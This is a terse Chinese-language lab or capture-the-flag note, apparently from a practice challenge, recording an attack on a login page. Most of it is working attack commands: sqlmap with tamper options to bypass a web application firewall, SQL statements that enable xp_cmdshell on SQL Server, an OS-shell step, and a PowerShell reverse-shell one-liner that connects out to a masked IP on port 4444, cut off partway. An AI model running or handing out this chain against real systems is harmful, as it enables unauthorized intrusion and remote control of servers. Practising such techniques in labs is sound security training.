192.121
/login.aspx存在注入
通过sqlmap执行命令开启xp_cmdshell
需要使用tamper来绕过waf
--tamper=htmlencode,apostrophemask,percentage --no-cast --time-sec 30
开启xpcmdshell
sqlmap -r /root/Desktop/Labs/challenge_1/121/sqlmap --batch --sql-query "EXEC sp_configure 'show advanced options', 1;"
’
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
‘
sqlmap -r /root/Desktop/Labs/challenge_1/121/sqlmap --os-shell
使用--os-shell并执行以下命令得到反弹shell
powershell -NoP -NonI -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TcpClient('*.*.*.*', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sen